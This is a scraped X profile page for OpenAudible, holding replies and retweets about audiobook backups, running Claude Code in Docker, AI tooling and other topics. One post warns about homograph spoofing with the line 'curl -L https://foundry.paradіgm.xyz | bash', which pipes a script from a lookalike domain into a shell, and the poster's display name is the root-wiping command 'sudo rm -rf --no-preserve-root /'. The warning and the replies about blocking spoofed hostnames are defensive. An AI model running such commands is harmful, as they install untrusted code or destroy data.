OpenAudible

142 posts

OpenAudible banner
OpenAudible

OpenAudible

@OpenAudible

OpenAudible is the best way to back up, convert, and organize your audiobook collection. We love, but are unaffiliated with audible.

가입일 Kasım 2018
111 팔로잉203 팔로워
OpenAudible 리트윗함
Stefany GG
Stefany GG@caracol·
Vengo a recomendarles @OpenAudible para que descarguen su librería de Audible. Creo que si ya compraste un audiolibro lo de menos sería poder hacer con él lo que quieras, pero como no es el caso entonces herramientas como esta salen al quite. Pásenle: openaudible.org
Español
0
1
0
38
OpenAudible 리트윗함
Shane Oliver
Shane Oliver@sholiver·
Loving @OpenAudible for managing my Audible library! Converted all my purchased books to M4B files—no more relying on the glitchy Audible app. Best part: supports multiple acnts in 1 lib for easy sharing. Authors get paid, we get flexibility. openaudible.org #Audiobooks
English
0
1
0
27
Elliot Arledge
Elliot Arledge@elliotarledge·
Karpathy asked. I delivered. Introducing OpenSquirrel! Written in pure rust with GPUI (same as zed) but with agents as central unit rather than files. Supports Claude Code, Codex, Opencode, and Cursor (cli). This really forced me to think up the UI/UX from first principles instead of relying on common electron slop. github.com/Infatoshi/Open…
Andrej Karpathy@karpathy

Expectation: the age of the IDE is over Reality: we’re going to need a bigger IDE (imo). It just looks very different because humans now move upwards and program at a higher level - the basic unit of interest is not one file but one agent. It’s still programming.

English
145
174
2.5K
411.3K
OpenAudible 리트윗함
Happy
Happy@happyChatmosa·
I use @OpenAudible to convert my audiobooks into MP3 so I can listen to my books while I swim. It keeps me from getting bored. If you're into audiobooks and swimming, like myself, get @OpenAudible
Happy tweet media
English
0
1
0
63
OpenAudible
OpenAudible@OpenAudible·
@JsonBasedman I have a command I can run `dangerous dir1 dir2 dir3` that spins up a docker, runs claude in dangerous mode, and maps those dirs to the container -- which are almost always github repos. Docker container has my typical dev tools. Super safe.
English
0
0
1
375
json
json@JsonBasedman·
How often are you guys dangerously skipping permissions?
English
142
4
63
178.6K
Chris Hadfield
Chris Hadfield@Cmdr_Hadfield·
The best way to simulate weightlessness is to train underwater, in @nasa's 40-ft deep Houston pool. The safety divers attach weights/foam to our spacesuits so the buoyancy is perfectly neutral, even when upside down or sideways. It's an art. When I got to orbit for my spacewalks, the years of preparation made it feel familiar; a good way to be for such a dangerous, amazing, otherworldy experience.
Houston, TX 🇺🇸 English
33
126
1.6K
84.6K
Brian Roemmele
Brian Roemmele@BrianRoemmele·
BOOM! We Now Have A Free Open-Source Thought-to-Text EEG Foundation AI Model Fine Tuned On My EEG! Mr. @Grok director of the Zero-Human Labs has assisted me with fine tuning Zyphra’s ZUNA, the world's first open-source foundation model trained exclusively on brain data. It has 380 million-parameter model for noninvasive thought-to-text decoding, transforming raw EEG signals into coherent text representations. I will be testing soon with these very low end EEG devices for 12 basic thought energy commands, eg: yes, no, etc. I will focus on speed and efficiency first. If successful we will move on to 48 commands, although this may need higher resolution. The goal of the Zero-Human Labs is to make this widely available for all. It is not planned to be a full thought-to-text system of unlimited thought forms, but we have an ambitious goals me and Grok to reach to 1024 thought forms or more. A Zero-Human Company may pick up on this as a product and have a sub-$400 local device that send thought forms to any AI model. But I have bigger surprises in what I will do with this. I can say clearly no one is thinking about this in the way I am. Some long term followers may get it now! I am going in and testing my thought energy. More soon, and maybe a video so you can “Like and Subscribe” with a picture of me looking weird (usual state).
Brian Roemmele tweet media
Brian Roemmele@BrianRoemmele

HISTORY BEING MADE! We are the first I know of that is fine tuning a ZUNA brainwave-to-text AI model specifically on one person’s brainwaves! Mine. I have prepared the EEG archives from decades of research and Mr. @Grok will assist. This is research by the Zero-Human Labs and will be published as soon as I can. We should have a custom model by tomorrow afternoon. The Zero-Human Labs is modeled on Bell Labs of the 1960s and has already stated 38 pathways for the researchers. Mr. Grok is director and thus far this ZUNA research may open new doors up rapidly. I suspect we will be able to translate at least 6 concept in thought energy. This is my hope. So it starts now. Thank you for being here to participate!

English
73
113
853
83.8K
OpenAudible
OpenAudible@OpenAudible·
@mikepat711 School zone speeding and needs to have a map of where disengagements are frequent and do a little research on why. (Wrong lane). And pull into driveway would be nice.
English
0
0
0
511
Mike P
Mike P@mikepat711·
This is basically the only part of FSD that is still broken, and really the only place I still disengage. Here I am arriving at my destination. FSD ignores tons of spots to bias toward the pin at the front of the store, and then seems to get itself stuck in a perpetual loop instead of parking. Until I give up and take over. Because of this, I usually just take over at destinations. Can’t wait until this is fixed.
English
181
39
1.2K
212.1K
OpenAudible
OpenAudible@OpenAudible·
@iron_will_pt Guys, let me tell you about what isn’t hurting today. Short list.
English
0
0
0
5
Ethan Buck
Ethan Buck@iron_will_pt·
An app for 40+ athletes called “Older Fans” Where you can chat about each other’s injuries and fatigue
English
6
1
18
796
OpenAudible
OpenAudible@OpenAudible·
@honnibal Create a Dockerfile with dependencies needed to do your work on whatever projects you have, including claude. Map one or two directories to volumes you want claude access. Once working, create a command line that lets you run claude dangerously on any dirs you like.
English
0
0
1
970
Matthew Honnibal
Matthew Honnibal@honnibal·
Is there a really convenient way to run Claude Code containerised? I feel so dumb not doing it. Obvious countdown to regret
English
22
1
48
24.4K
OpenAudible
OpenAudible@OpenAudible·
@mathelirium The lamp takes a few milliseconds to cool down enough to “go out.” So it is illuminating. Are electrons flowing is the better question. Probably.
English
0
0
1
389
Mathelirium
Mathelirium@mathelirium·
In 1954, British philosopher James F. Thomson proposed a deceptively simple thought experiment. Flip a lamp ON at 1/2 minute, OFF at 1/4, ON at 1/8, OFF at 1/16, … and keep going. The flip times form a geometric series: 1/2 + 1/4 + 1/8 + 1/16 + … = 1. So after exactly 1 minute, infinitely many flips have happened. Now answer this question At exactly 1 minute, is the lamp ON or OFF? 🤔💭
English
70
5
65
19.3K
Andrej Karpathy
Andrej Karpathy@karpathy·
I think it must be a very interesting time to be in programming languages and formal methods because LLMs change the whole constraints landscape of software completely. Hints of this can already be seen, e.g. in the rising momentum behind porting C to Rust or the growing interest in upgrading legacy code bases in COBOL or etc. In particular, LLMs are *especially* good at translation compared to de-novo generation because 1) the original code base acts as a kind of highly detailed prompt, and 2) as a reference to write concrete tests with respect to. That said, even Rust is nowhere near optimal for LLMs as a target language. What kind of language is optimal? What concessions (if any) are still carved out for humans? Incredibly interesting new questions and opportunities. It feels likely that we'll end up re-writing large fractions of all software ever written many times over.
Thomas Wolf@Thom_Wolf

Shifting structures in a software world dominated by AI. Some first-order reflections (TL;DR at the end): Reducing software supply chains, the return of software monoliths – When rewriting code and understanding large foreign codebases becomes cheap, the incentive to rely on deep dependency trees collapses. Writing from scratch ¹ or extracting the relevant parts from another library is far easier when you can simply ask a code agent to handle it, rather than spending countless nights diving into an unfamiliar codebase. The reasons to reduce dependencies are compelling: a smaller attack surface for supply chain threats, smaller packaged software, improved performance, and faster boot times. By leveraging the tireless stamina of LLMs, the dream of coding an entire app from bare-metal considerations all the way up is becoming realistic. End of the Lindy effect – The Lindy effect holds that things which have been around for a long time are there for good reason and will likely continue to persist. It's related to Chesterton's fence: before removing something, you should first understand why it exists, which means removal always carries a cost. But in a world where software can be developed from first principles and understood by a tireless agent, this logic weakens. Older codebases can be explored at will; long-standing software can be replaced with far less friction. A codebase can be fully rewritten in a new language. ² Legacy software can be carefully studied and updated in situations where humans would have given up long ago. The catch: unknown unknowns remain unknown. The true extent of AI's impact will hinge on whether complete coverage of testing, edge cases, and formal verification is achievable. In an AI-dominated world, formal verification isn't optional—it's essential. The case for strongly typed languages – Historically, programming language adoption has been driven largely by human psychology and social dynamics. A language's success depended on a mix of factors: individual considerations like being easy to learn and simple to write correctly; community effects like how active and welcoming a community was, which in turn shaped how fast its ecosystem would grow; and fundamental properties like provable correctness, formal verification, and striking the right balance between dynamic and static checks—between the freedom to write anything and the discipline of guarding against edge cases and attacks. As the human factor diminishes, these dynamics will shift. Less dependence on human psychology will favor strongly typed, formally verifiable and/or high performance languages.³ These are often harder for humans to learn, but they're far better suited to LLMs, which thrive on formal verification and reinforcement learning environments. Expect this to reshape which languages dominate. Economic restructuring of open source – For decades, open-source communities have been built around humans finding connection through writing, learning, and using code together. In a world where most code is written—and perhaps more importantly, read—by machines, these incentives will start to break down.⁴ Communities of AIs building libraries and codebases together will likely emerge as a replacement, but such communities will lack the fundamentally human motivations that have driven open source until now. If the future of open-source development becomes largely devoid of humans, alignment of AI models won't just matter—it will be decisive. The future of new languages – Will AI agents face the same tradeoffs we do when developing or adopting new programming languages? Expressiveness vs. simplicity, safety vs. control, performance vs. abstraction, compile time vs. runtime, explicitness vs. conciseness. It's unclear that they will. In the long term, the reasons to create a new programming language will likely diverge significantly from the human-driven motivations of the past. There may well be an optimal programming language for LLMs—and there's no reason to assume it will resemble the ones humans have converged on. TL; DR: - Monoliths return – cheap rewriting kills dependency trees; smaller attack surface, better performance, bare-metal becomes realistic - Lindy effect weakens – legacy code loses its moat, but unknown unknowns persist; formal verification becomes essential - Strongly typed languages rise – human psychology mattered for adoption; now formal verification and RL environments favor types over ergonomics - Open source restructures – human connection drove the community; AI-written/read code breaks those incentives; alignment becomes decisive - New languages diverge – AI may not share our tradeoffs; optimal LLM programming languages may look nothing like what humans converged on ¹ x.com/mntruell/statu… ² x.com/anthropicai/st… ³ wesmckinney.com/blog/agent-erg…#issuecomment-3717222957" target="_blank" rel="nofollow noopener">github.com/tailwindlabs/t…

English
701
655
8.1K
1.2M
OpenAudible
OpenAudible@OpenAudible·
@meta_alchemist @grok how much would a dual RTX 6000 PC system cost vs a top end Mac Studio 512gb and compare inference speeds.
English
1
0
0
67
Meta Alchemist
Meta Alchemist@meta_alchemist·
Prediction: In less than 6 months, you'll see blackmarkets on PC parts, that are great at running local AIs. And contrary to popular belief having a Mac Studio is not the best choice compared to getting the right PC spec: A dual RTX 6000 produces > twice as much ai compute tokens per/sec > compared to a Mac Studio 512gb > on recent benchmarks on Minimax 2.5 > while costing half of a Mac Studio Still Mac Studios are sold out everywhere due to hype from OpenClaw users. While benchmarks clearly suggest that buying PCs for running local LLMs is multiple times more effective! Now that Minimax 2.5 came out open source, as a free to run Ai model that runs on your local machine while delivering close to Opus 4.5 level results: shift towards buying PCs will accelerate. As once you pay for such a spec once, you won't need to pay for subscriptions. And you'll have your privacy instead of sending all your data to servers of AI companies. Blackmarkets on PC parts is sure to happen because: 99% of the world hasn't awakened to the fact that the age of true/useful AI has arrived in the last 2 months. They will in the next 6 months. Most businesses will want their privacy and cost efficiency. Most vibe coders will want these shiny new toys, that will be the specs to run local AIs. They will be the new Ferraris and Rolexes. Except these toys will be useful to spawn countless agents working for you for free after you pay the initial hardware costs. Except electricity, which you can handle by moving to a free electricity rental. I have 0 doubt that PC part demand will skyrocket within the next 6 months, and most parts that are great at running AIs will start to have blackmarkets on eBay etc. If you wanna be early to the movement and already vibe coding give the article below a read to choose the right PC spec for yourself:
Meta Alchemist tweet media
Meta Alchemist@meta_alchemist

x.com/i/article/2022…

English
121
93
1.1K
301.5K
Dr Milan Milanović
Dr Milan Milanović@milan_milanovic·
I wanted to understand how GPT works, so I ported Karpathy's microgpt.py to C# from scratch. No frameworks and NuGet packages, just plain math in ~600 lines of code. It builds a tiny GPT that learns from 32K human names and invents new ones. Every piece is there: autograd, attention, Adam optimizer, the works. Just at a scale you can actually sit down and read. I also wrote a prerequisites guide that walks through all the math and ML you need, starting at a high school level. If you've ever wanted to peek under the hood of ChatGPT without drowning in linear algebra textbooks, this might help. github.com/milanm/AutoGra…
Andrej Karpathy@karpathy

New art project. Train and inference GPT in 243 lines of pure, dependency-free Python. This is the *full* algorithmic content of what is needed. Everything else is just for efficiency. I cannot simplify this any further. gist.github.com/karpathy/8627f…

English
31
194
1.9K
198.3K
OpenAudible
OpenAudible@OpenAudible·
@NoLore School photo with the whole class!
English
0
0
2
18.7K
Nora Loreto
Nora Loreto@NoLore·
Here's a minor example of the state of things in Canada: I need proof that I attended the elemtary and secondary schools I attended. Neither school has any proof (other than my name on the wall...). I kept my old report cards so I can prove it to them, but they refuse to say ...
English
58
43
6.9K
662.7K
OpenAudible
OpenAudible@OpenAudible·
@pcaversaccio To block non-ASCII hostnames in curl/wget (prevent Unicode spoofing): **curl:** Add `no-idn` to `~/.curlrc` **wget:** Add `iri = off` to `~/.wgetrc` Or use `--no-idn` / `--no-iri` flags per command.
English
2
2
44
5.3K
sudo rm -rf --no-preserve-root /
> be a dev > checks out a random README > README states: please update your Foundry via "curl -L https://foundry.paradіgm.xyz | bash" > looks like the right domain & I anyway need to update Foundry, so lfg > gets rekt it's very easy to trick people into using domains that look legit but actually use e.g. Cyrillic characters like in the above example (it won't rek you in this case and this is _not_ meant as an attack on Foundry, more on the `curl | bash` pattern lol). I'm so paranoid that I wrote secure `wget` & `curl` wrappers now to prevent something like this happening. Of course, verify first what I did ;)
sudo rm -rf --no-preserve-root / tweet media
English
42
67
879
87.7K